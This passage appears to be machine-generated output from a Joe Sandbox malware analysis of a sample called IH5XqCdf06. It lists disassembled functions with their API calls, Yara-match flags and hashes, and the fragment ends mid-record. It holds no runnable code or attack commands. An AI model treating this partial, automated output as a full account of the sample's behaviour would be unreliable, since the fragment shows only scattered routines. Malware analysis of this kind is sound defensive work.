                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                    • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                    • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                    • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0064C8DE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$|5d
                                                                                                    • API String ID: 2005118841-737947648
                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction ID: 22b7ff720dde30ddcf31c38ae53d8213634573ad9ebdce6e25af975634271914
                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction Fuzzy Hash: 43F02B729012086FCB84E654CC42BEE37999B55321F14806FED42AB383EA68AD05CBA4
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pScheduler
                                                                                                    • API String ID: 3657713681-923244539
                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catchmake_shared
                                                                                                    • String ID: MOC$RCC$v)D
                                                                                                    • API String ID: 3472968176-3108830043
                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction ID: dec414d5e6d74f0fc9f8c66b17e7779545eb0c914d244b876ad6f429dcdee145
                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction Fuzzy Hash: 6FF03C71A00515DFEB92FF64C4026AC3762AF01B00F459695F9405B262CB789D48CFA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                    • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                    • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                    • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                    • Instruction ID: 3201c4049c39fcf693da538c343f63f6fcaa3f866028979ea484046db53d9846
                                                                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                    • Instruction Fuzzy Hash: A971A375900256DBCB219F58C884AFFBBB7EF55350F24522AE412E7281DB708DC2CBA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    • _free.LIBCMT ref: 00430B4F
                                                                                                    • _free.LIBCMT ref: 00430B66
                                                                                                    • _free.LIBCMT ref: 00430B85
                                                                                                    • _free.LIBCMT ref: 00430BA0
                                                                                                    • _free.LIBCMT ref: 00430BB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033488037-0
                                                                                                    • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                    • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                    • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                    • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033488037-0
                                                                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                    • Instruction ID: fc74c6737cb4f67025cc9de3af9b6664bfb3f0508d8c18d7bb5cbcef4a7238ff
                                                                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                    • Instruction Fuzzy Hash: 5C519171A00304EBEB60DF69C841AAAB7F6EF59720B14856DE80DDB350E771EA01DB54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction ID: d34bf184e4408fa1fdf5ec961f22d81c934e28d8c3a1a408f2b6fce5dee1d444
                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                    • Instruction Fuzzy Hash: D841D236A002049BDB24DF7CC981A9DB7E6EF85714F2585AAE909EF381D731ED01CB81
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                    • __freea.LIBCMT ref: 0043698E
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 313313983-0
                                                                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                    APIs
                                                                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                    • List.LIBCMT ref: 0041AFB4
                                                                                                    • List.LIBCMT ref: 0041AFC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3281396844-0
                                                                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                    APIs
                                                                                                    • _SpinWait.LIBCONCRT ref: 0065B152
                                                                                                      • Part of subcall function 00651188: _SpinWait.LIBCONCRT ref: 006511A0
                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0065B166
                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0065B198
                                                                                                    • List.LIBCMT ref: 0065B21B
                                                                                                    • List.LIBCMT ref: 0065B22A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3281396844-0
                                                                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                    • Instruction ID: 105736382d4b3aa6bbcc5025c42192bcb3535955b991b4e016f9a754635275a8
                                                                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                    • Instruction Fuzzy Hash: DC318A31901A16DFCB60EFA4C9616EDB7B2BF05306F14116EDC516B782CB716E48CBA8
                                                                                                    APIs
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 2357751836-0
                                                                                                    • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                    • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                    • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                    • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                    APIs
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 006450A3
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 006450B7
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 0064511C
                                                                                                    • __Getcoll.LIBCPMT ref: 0064512B
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0064513B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                    • String ID:
                                                                                                    • API String ID: 2395760641-0
                                                                                                    • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                    • Instruction ID: 407792b8e4b1ab4b0ae32d6a1ebdac94e9ffb0dfbc4e1829c9d82fa66e83da5e
                                                                                                    • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                    • Instruction Fuzzy Hash: E121DE71815704EFDB80EFA0C4457DDBBB2BF50325F10806EE082AB282DBB48A44CB99
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                    • _free.LIBCMT ref: 00431F98
                                                                                                    • _free.LIBCMT ref: 00431FBF
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                    • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                    • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(0064DAD7,0064DAD7,00000002,0066ED35,00673951,00000000,?,00666A05,00000002,00000000,00000000,00000000,?,0064CF88,0064DAD7,00000004), ref: 006721CA
                                                                                                    • _free.LIBCMT ref: 006721FF
                                                                                                    • _free.LIBCMT ref: 00672226
                                                                                                    • SetLastError.KERNEL32(00000000,?,0064DAD7), ref: 00672233
                                                                                                    • SetLastError.KERNEL32(00000000,?,0064DAD7), ref: 0067223C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                    • Instruction ID: 45363b159b9a403987d20727aa9362e5bf29044809924854cb89a6e923326a07
                                                                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                    • Instruction Fuzzy Hash: CF01D636245A027B92522B345C55D6A261BBBD2772730812CF52D92393EEA5CE02512D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                    • _free.LIBCMT ref: 00431F11
                                                                                                    • _free.LIBCMT ref: 00431F39
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                    • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                    • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                    • _free.LIBCMT ref: 00672178
                                                                                                    • _free.LIBCMT ref: 006721A0
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721AD
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                    • Instruction ID: af056849fc88584f67dec575aebe1e036a04be28428190e7e4906aee6238bd0e
                                                                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                    • Instruction Fuzzy Hash: A6F0F935144A017BD2522734AC4AA5A262BABC2B72F71822CFB0C927E1FE618902512D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                      • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                    • String ID:
                                                                                                    • API String ID: 4266703842-0
                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                    APIs
                                                                                                      • Part of subcall function 006529A4: TlsGetValue.KERNEL32(?,?,00650DC2,00652ECF,00000000,?,00650DA0,?,?,?,00000000,?,00000000), ref: 006529AA
                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00657BB1
                                                                                                      • Part of subcall function 0066121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00661241
                                                                                                      • Part of subcall function 0066121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0066125A
                                                                                                      • Part of subcall function 0066121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006612D0
                                                                                                      • Part of subcall function 0066121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 006612D8
                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00657BBF
                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00657BC9
                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00657BD3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00657BF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                    • String ID:
                                                                                                    • API String ID: 4266703842-0
                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction ID: d3c73e5935e405bffaeea9075b1b688d733d677fdf8e35cf6bbee9f42da06932
                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                    • Instruction Fuzzy Hash: 81F04631A002196BCB55BB75D86286EF62B8FC1B12F04026EFC0053352EF24AE0D86D9
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00439E5D
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 00439E6F
                                                                                                    • _free.LIBCMT ref: 00439E81
                                                                                                    • _free.LIBCMT ref: 00439E93
                                                                                                    • _free.LIBCMT ref: 00439EA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
